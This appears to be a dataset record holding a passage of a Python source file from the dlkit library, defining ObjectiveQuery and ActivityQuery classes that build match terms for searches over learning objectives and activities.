hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8c98b0791a0f21fc401bfce5e57f30be97089acf
| 68,757
|
py
|
Python
|
dlkit/json_/learning/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/learning/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/learning/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON implementations of learning queries."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from .. import utilities
from ..id.objects import IdList
from ..osid import queries as osid_queries
from ..primitives import Id
from ..utilities import get_registry
from dlkit.abstract_osid.learning import queries as abc_learning_queries
from dlkit.abstract_osid.osid import errors
class ObjectiveQuery(abc_learning_queries.ObjectiveQuery, osid_queries.OsidObjectQuery, osid_queries.OsidFederateableQuery):
"""This is the query for searching objectives.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'learning.Objective'
self._runtime = runtime
record_type_data_sets = get_registry('OBJECTIVE_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_assessment_id(self, assessment_id, match):
"""Sets the assessment ``Id`` for this query.
arg: assessment_id (osid.id.Id): an assessment ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``assessment_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('assessmentId', str(assessment_id), match)
def clear_assessment_id_terms(self):
"""Clears the assessment ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('assessmentId')
assessment_id_terms = property(fdel=clear_assessment_id_terms)
def supports_assessment_query(self):
"""Tests if an ``AssessmentQuery`` is available for querying activities.
return: (boolean) - ``true`` if an assessment query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_assessment_query(self):
"""Gets the query for an assessment.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.assessment.AssessmentQuery) - the assessment query
raise: Unimplemented - ``supports_assessment_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_assessment_query()`` is ``true``.*
"""
raise errors.Unimplemented()
assessment_query = property(fget=get_assessment_query)
@utilities.arguments_not_none
def match_any_assessment(self, match):
"""Matches an objective that has any assessment assigned.
arg: match (boolean): ``true`` to match objectives with any
assessment, ``false`` to match objectives with no
assessment
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_assessment_terms(self):
"""Clears the assessment terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('assessment')
assessment_terms = property(fdel=clear_assessment_terms)
@utilities.arguments_not_none
def match_knowledge_category_id(self, grade_id, match):
"""Sets the knowledge category ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('knowledgeCategoryId', str(grade_id), match)
def clear_knowledge_category_id_terms(self):
"""Clears the knowledge category ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('knowledgeCategoryId')
knowledge_category_id_terms = property(fdel=clear_knowledge_category_id_terms)
def supports_knowledge_category_query(self):
"""Tests if a ``GradeQuery`` is available for querying knowledge categories.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_knowledge_category_query(self):
"""Gets the query for a knowledge category.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_knowledge_category_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_knowledge_category_query()`` is ``true``.*
"""
raise errors.Unimplemented()
knowledge_category_query = property(fget=get_knowledge_category_query)
@utilities.arguments_not_none
def match_any_knowledge_category(self, match):
"""Matches an objective that has any knowledge category.
arg: match (boolean): ``true`` to match objectives with any
knowledge category, ``false`` to match objectives with
no knowledge category
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_knowledge_category_terms(self):
"""Clears the knowledge category terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('knowledgeCategory')
knowledge_category_terms = property(fdel=clear_knowledge_category_terms)
@utilities.arguments_not_none
def match_cognitive_process_id(self, grade_id, match):
"""Sets the cognitive process ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('cognitiveProcessId', str(grade_id), match)
def clear_cognitive_process_id_terms(self):
"""Clears the cognitive process ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('cognitiveProcessId')
cognitive_process_id_terms = property(fdel=clear_cognitive_process_id_terms)
def supports_cognitive_process_query(self):
"""Tests if a ``GradeQuery`` is available for querying cognitive processes.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_cognitive_process_query(self):
"""Gets the query for a cognitive process.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_cognitive_process_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_cognitive_process_query()`` is ``true``.*
"""
raise errors.Unimplemented()
cognitive_process_query = property(fget=get_cognitive_process_query)
@utilities.arguments_not_none
def match_any_cognitive_process(self, match):
"""Matches an objective that has any cognitive process.
arg: match (boolean): ``true`` to match objectives with any
cognitive process, ``false`` to match objectives with no
cognitive process
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_cognitive_process_terms(self):
"""Clears the cognitive process terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('cognitiveProcess')
cognitive_process_terms = property(fdel=clear_cognitive_process_terms)
@utilities.arguments_not_none
def match_activity_id(self, activity_id, match):
"""Sets the activity ``Id`` for this query.
arg: activity_id (osid.id.Id): an activity ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``activity_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('activityId', str(activity_id), match)
def clear_activity_id_terms(self):
"""Clears the activity ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('activityId')
activity_id_terms = property(fdel=clear_activity_id_terms)
def supports_activity_query(self):
"""Tests if an ``ActivityQuery`` is available for querying activities.
return: (boolean) - ``true`` if an activity query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_activity_query(self):
"""Gets the query for an activity.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ActivityQuery) - the activity query
raise: Unimplemented - ``supports_activity_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_activity_query()`` is ``true``.*
"""
raise errors.Unimplemented()
activity_query = property(fget=get_activity_query)
@utilities.arguments_not_none
def match_any_activity(self, match):
"""Matches an objective that has any related activity.
arg: match (boolean): ``true`` to match objectives with any
activity, ``false`` to match objectives with no activity
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_activity_terms(self):
"""Clears the activity terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
activity_terms = property(fdel=clear_activity_terms)
@utilities.arguments_not_none
def match_requisite_objective_id(self, requisite_objective_id, match):
"""Sets the requisite objective ``Id`` for this query.
arg: requisite_objective_id (osid.id.Id): a requisite
objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``requisite_objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('requisiteObjectiveId', str(requisite_objective_id), match)
def clear_requisite_objective_id_terms(self):
"""Clears the requisite objective ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('requisiteObjectiveId')
requisite_objective_id_terms = property(fdel=clear_requisite_objective_id_terms)
def supports_requisite_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available for querying requisite objectives.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_requisite_objective_query(self):
"""Gets the query for a requisite objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented - ``supports_requisite_objective_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_requisite_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
requisite_objective_query = property(fget=get_requisite_objective_query)
@utilities.arguments_not_none
def match_any_requisite_objective(self, match):
"""Matches an objective that has any related requisite.
arg: match (boolean): ``true`` to match objectives with any
requisite, ``false`` to match objectives with no
requisite
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_requisite_objective_terms(self):
"""Clears the requisite objective terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
requisite_objective_terms = property(fdel=clear_requisite_objective_terms)
@utilities.arguments_not_none
def match_dependent_objective_id(self, dependent_objective_id, match):
"""Sets the dependent objective ``Id`` to query objectives dependent on the given objective.
arg: dependent_objective_id (osid.id.Id): a dependent
objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``dependent_objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('dependentObjectiveId', str(dependent_objective_id), match)
def clear_dependent_objective_id_terms(self):
"""Clears the dependent objective ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('dependentObjectiveId')
dependent_objective_id_terms = property(fdel=clear_dependent_objective_id_terms)
def supports_depndent_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available for querying dependent objectives.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_dependent_objective_query(self):
"""Gets the query for a dependent objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented - ``supports_dependent_objective_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_dependent_query()`` is ``true``.*
"""
raise errors.Unimplemented()
dependent_objective_query = property(fget=get_dependent_objective_query)
@utilities.arguments_not_none
def match_any_dependent_objective(self, match):
"""Matches an objective that has any related dependents.
arg: match (boolean): ``true`` to match objectives with any
dependent, ``false`` to match objectives with no
dependents
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_dependent_objective_terms(self):
"""Clears the dependent objective terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
dependent_objective_terms = property(fdel=clear_dependent_objective_terms)
@utilities.arguments_not_none
def match_equivalent_objective_id(self, equivalent_objective_id, match):
"""Sets the equivalent objective ``Id`` to query equivalents.
arg: equivalent_objective_id (osid.id.Id): an equivalent
objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``equivalent_objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('equivalentObjectiveId', str(equivalent_objective_id), match)
def clear_equivalent_objective_id_terms(self):
"""Clears the equivalent objective ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('equivalentObjectiveId')
equivalent_objective_id_terms = property(fdel=clear_equivalent_objective_id_terms)
def supports_equivalent_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available for querying equivalent objectives.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_equivalent_objective_query(self):
"""Gets the query for an equivalent objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented -
``supports_equivalent_objective_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_equivalent_query()`` is ``true``.*
"""
raise errors.Unimplemented()
equivalent_objective_query = property(fget=get_equivalent_objective_query)
@utilities.arguments_not_none
def match_any_equivalent_objective(self, match):
"""Matches an objective that has any related equivalents.
arg: match (boolean): ``true`` to match objectives with any
equivalent, ``false`` to match objectives with no
equivalents
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_equivalent_objective_terms(self):
"""Clears the equivalent objective terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
equivalent_objective_terms = property(fdel=clear_equivalent_objective_terms)
@utilities.arguments_not_none
def match_ancestor_objective_id(self, objective_id, match):
"""Sets the objective ``Id`` for this query to match objectives that have the specified objective as an ancestor.
arg: objective_id (osid.id.Id): an objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('ancestorObjectiveId', str(objective_id), match)
def clear_ancestor_objective_id_terms(self):
"""Clears the ancestor objective ``Id`` query terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('ancestorObjectiveId')
ancestor_objective_id_terms = property(fdel=clear_ancestor_objective_id_terms)
def supports_ancestor_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_ancestor_objective_query(self):
"""Gets the query for an objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented - ``supports_ancestor_objective_query()``
is ``false``
*compliance: optional -- This method must be implemented if
``supports_ancestor_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
ancestor_objective_query = property(fget=get_ancestor_objective_query)
@utilities.arguments_not_none
def match_any_ancestor_objective(self, match):
"""Matches objectives that have any ancestor.
arg: match (boolean): ``true`` to match objective with any
ancestor, ``false`` to match root objectives
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ancestor_objective_terms(self):
"""Clears the ancestor objective query terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
ancestor_objective_terms = property(fdel=clear_ancestor_objective_terms)
@utilities.arguments_not_none
def match_descendant_objective_id(self, objective_id, match):
"""Sets the objective ``Id`` for this query to match objectives that have the specified objective as a descendant.
arg: objective_id (osid.id.Id): an objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('descendantObjectiveId', str(objective_id), match)
def clear_descendant_objective_id_terms(self):
"""Clears the descendant objective ``Id`` query terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('descendantObjectiveId')
descendant_objective_id_terms = property(fdel=clear_descendant_objective_id_terms)
def supports_descendant_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_descendant_objective_query(self):
"""Gets the query for an objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented -
``supports_descendant_objective_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_descendant_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
descendant_objective_query = property(fget=get_descendant_objective_query)
@utilities.arguments_not_none
def match_any_descendant_objective(self, match):
"""Matches objectives that have any ancestor.
arg: match (boolean): ``true`` to match objectives with any
ancestor, ``false`` to match leaf objectives
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_descendant_objective_terms(self):
"""Clears the descendant objective query terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
descendant_objective_terms = property(fdel=clear_descendant_objective_terms)
@utilities.arguments_not_none
def match_objective_bank_id(self, objective_bank_id, match):
"""Sets the objective bank ``Id`` for this query.
arg: objective_bank_id (osid.id.Id): an objective bank ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_bank_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedObjectiveBankIds', str(objective_bank_id), match)
def clear_objective_bank_id_terms(self):
"""Clears the objective bank ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedObjectiveBankIds')
objective_bank_id_terms = property(fdel=clear_objective_bank_id_terms)
def supports_objective_bank_query(self):
"""Tests if a ``ObjectiveBankQuery`` is available for querying objective banks.
return: (boolean) - ``true`` if an objective bank query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_objective_bank_query(self):
"""Gets the query for an objective bank.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveBankQuery) - the objective bank
query
raise: Unimplemented - ``supports_objective_bank_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_objective_bank_query()`` is ``true``.*
"""
raise errors.Unimplemented()
objective_bank_query = property(fget=get_objective_bank_query)
def clear_objective_bank_terms(self):
"""Clears the objective bank terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('objectiveBank')
objective_bank_terms = property(fdel=clear_objective_bank_terms)
@utilities.arguments_not_none
def get_objective_query_record(self, objective_record_type):
"""Gets the objective query record corresponding to the given ``Objective`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: objective_record_type (osid.type.Type): an objective
query record type
return: (osid.learning.records.ObjectiveQueryRecord) - the
objective query record
raise: NullArgument - ``objective_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported - ``has_record_type(objective_record_type)``
is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class ActivityQuery(abc_learning_queries.ActivityQuery, osid_queries.OsidObjectQuery, osid_queries.OsidSubjugateableQuery):
"""This is the query for searching activities.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'learning.Activity'
self._runtime = runtime
record_type_data_sets = get_registry('ACTIVITY_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_objective_id(self, objective_id, match):
"""Sets the objective ``Id`` for this query.
arg: objective_id (osid.id.Id): an objective ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``objective_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('objectiveId', str(objective_id), match)
def clear_objective_id_terms(self):
"""Clears the objective ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('objectiveId')
objective_id_terms = property(fdel=clear_objective_id_terms)
def supports_objective_query(self):
"""Tests if an ``ObjectiveQuery`` is available for querying objectives.
return: (boolean) - ``true`` if an objective query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_objective_query(self):
"""Gets the query for an objective.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.learning.ObjectiveQuery) - the objective query
raise: Unimplemented - ``supports_objective_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
objective_query = property(fget=get_objective_query)
def clear_objective_terms(self):
"""Clears the objective terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('objective')
objective_terms = property(fdel=clear_objective_terms)
@utilities.arguments_not_none
def match_asset_id(self, asset_id, match):
"""Sets the asset ``Id`` for this query.
arg: asset_id (osid.id.Id): an asset ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``asset_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('assetId', str(asset_id), match)
def clear_asset_id_terms(self):
"""Clears the asset ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('assetId')
asset_id_terms = property(fdel=clear_asset_id_terms)
def supports_asset_query(self):
"""Tests if an ``AssetQuery`` is available for querying objectives.
return: (boolean) - ``true`` if an robjective query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_asset_query(self):
"""Gets the query for an asset.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.repository.AssetQuery) - the asset query
raise: Unimplemented - ``supports_asset_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_objective_query()`` is ``true``.*
"""
raise errors.Unimplemented()
asset_query = property(fget=get_asset_query)
@utilities.arguments_not_none
def match_any_asset(self, match):
"""Matches an activity that has any objective assigned.
arg: match (boolean): ``true`` to match activities with any
asset, ``false`` to match activities with no asset
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_asset_terms(self):
"""Clears the asset terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
asset_terms = property(fdel=clear_asset_terms)
@utilities.arguments_not_none
def match_course_id(self, course_id, match):
"""Sets the course ``Id`` for this query.
arg: course_id (osid.id.Id): a course ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``course_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('courseId', str(course_id), match)
def clear_course_id_terms(self):
"""Clears the course ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('courseId')
course_id_terms = property(fdel=clear_course_id_terms)
def supports_course_query(self):
"""Tests if a ``CourseQuery`` is available for querying courses.
return: (boolean) - ``true`` if a course query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
